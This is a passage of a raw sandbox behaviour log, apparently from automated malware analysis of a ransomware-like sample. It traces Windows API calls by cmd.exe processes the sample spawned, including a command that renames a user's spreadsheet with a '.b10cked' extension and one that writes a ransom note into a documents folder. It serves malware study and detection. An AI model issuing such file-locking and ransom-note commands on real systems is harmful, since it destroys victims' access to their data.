returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegCloseKey (hKey=0x40) returned 0x0 [0132.571] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee964 | out: phkResult=0x2ee964*=0x40) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x0, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x9, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegCloseKey (hKey=0x40) returned 0x0 [0132.571] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.571] srand (_Seed=0x5b886367) [0132.571] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" [0132.571] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" [0132.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.572] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.572] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.572] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0132.572] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.572] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.572] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.572] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.572] GetEnvironmentStringsW () returned 0x3d22e8* [0132.572] FreeEnvironmentStringsW (penv=0x3d22e8) returned 1 [0132.572] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.572] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.572] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.572] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.572] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.572] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.572] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.572] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef730, lpFilePart=0x2ef72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef72c*="Desktop") returned 0x18 [0132.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.573] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4ac | out: lpFindFileData=0x2ef4ac) returned 0x3d0028 [0132.573] FindClose (in: hFindFile=0x3d0028 | out: hFindFile=0x3d0028) returned 1 [0132.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.573] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.573] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.573] GetEnvironmentStringsW () returned 0x3d2b08* [0132.574] FreeEnvironmentStringsW (penv=0x3d2b08) returned 1 [0132.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.574] GetConsoleOutputCP () returned 0x1b5 [0132.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.574] GetUserDefaultLCID () returned 0x409 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef870, cchData=128 | out: lpLCData="0") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef870, cchData=128 | out: lpLCData="0") returned 2 [0132.574] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef870, cchData=128 | out: lpLCData="1") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.575] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.575] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.575] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.576] GetConsoleTitleW (in: lpConsoleTitle=0x3c08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.576] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.577] _wcsicmp (_String1="move", _String2=")") returned 68 [0132.577] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0132.577] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0132.577] _wcsicmp (_String1="IF", _String2="move") returned -4 [0132.577] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0132.577] _wcsicmp (_String1="REM", _String2="move") returned 5 [0132.577] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0132.579] GetConsoleTitleW (in: lpConsoleTitle=0x2ef568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.580] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CD") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="REN") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="SET") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="MD") returned 11 [0132.580] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0132.580] _wcsicmp (_String1="move", _String2="RD") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0132.580] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0132.580] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0132.580] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0132.580] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0132.580] _wcsicmp (_String1="move", _String2="VER") returned -9 [0132.580] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0132.580] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0132.580] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0132.580] _wcsicmp (_String1="move", _String2="START") returned -6 [0132.580] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0132.580] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0132.580] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0132.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.582] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef324, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef31c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef31c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.582] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.583] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.583] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0132.583] _wcsicmp (_String1="OASES7~1.XLS", _String2=".") returned 65 [0132.583] _wcsicmp (_String1="OASES7~1.XLS", _String2="..") returned 65 [0132.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7~1.xls")) returned 0x20 [0132.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.583] SetErrorMode (uMode=0x0) returned 0x0 [0132.583] SetErrorMode (uMode=0x1) returned 0x0 [0132.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", nBufferLength=0x104, lpBuffer=0x2eecac, lpFilePart=0x2eec94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", lpFilePart=0x2eec94*="OASES7~1.XLS") returned 0x2d [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x10 [0132.584] _wcsicmp (_String1="OASES7~1.XLS", _String2=".") returned 65 [0132.584] _wcsicmp (_String1="OASES7~1.XLS", _String2="..") returned 65 [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7~1.xls")) returned 0x20 [0132.584] SetErrorMode (uMode=0x0) returned 0x0 [0132.584] SetErrorMode (uMode=0x1) returned 0x0 [0132.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", nBufferLength=0x104, lpBuffer=0x2ef128, lpFilePart=0x2eeec0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", lpFilePart=0x2eeec0*="OASES7~1.XLS") returned 0x2d [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] SetErrorMode (uMode=0x0) returned 0x0 [0132.584] SetErrorMode (uMode=0x1) returned 0x0 [0132.584] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", nBufferLength=0x104, lpBuffer=0x2ef330, lpFilePart=0x2eeec0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", lpFilePart=0x2eeec0*="Oases7ZDuwJ0FV.xls.b10cked") returned 0x3b [0132.584] SetErrorMode (uMode=0x0) returned 0x1 [0132.584] SetLastError (dwErrCode=0x0) [0132.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls.b10cked")) returned 0xffffffff [0132.584] GetLastError () returned 0x2 [0132.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2ee83c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee83c) returned 0x3c0eb0 [0132.584] FindNextFileW (in: hFindFile=0x3c0eb0, lpFindFileData=0x2ee83c | out: lpFindFileData=0x2ee83c) returned 0 [0132.585] GetLastError () returned 0x12 [0132.585] FindClose (in: hFindFile=0x3c0eb0 | out: hFindFile=0x3c0eb0) returned 1 [0132.586] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x3d1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1c08) returned 0x3c0eb0 [0132.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", nBufferLength=0x104, lpBuffer=0x2eead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked", lpFilePart=0x0) returned 0x3b [0132.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls", nBufferLength=0x104, lpBuffer=0x2eead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls", lpFilePart=0x0) returned 0x33 [0132.586] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls")) returned 0x20 [0132.586] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\oases7zduwj0fv.xls.b10cked"), dwFlags=0x3) returned 1 [0132.586] FindClose (in: hFindFile=0x3c0eb0 | out: hFindFile=0x3c0eb0) returned 1 [0132.587] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eea88 | out: _Buffer=" 1") returned 9 [0132.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.587] GetFileType (hFile=0x7) returned 0x2 [0132.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea14 | out: lpMode=0x2eea14) returned 1 [0132.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea48 | out: lpConsoleScreenBufferInfo=0x2eea48) returned 1 [0132.679] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.679] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eea88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.679] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eea6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea6c*=0x1a) returned 1 [0132.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.679] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0132.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.679] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.679] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.680] SetConsoleInputExeNameW () returned 0x1 [0132.680] GetConsoleOutputCP () returned 0x1b5 [0132.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.680] exit (_Code=0) Process: id = "116" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12496 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12497 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12498 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12499 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12500 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12501 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12502 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12503 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12504 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12505 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12541 start_va = 0x20000 end_va = 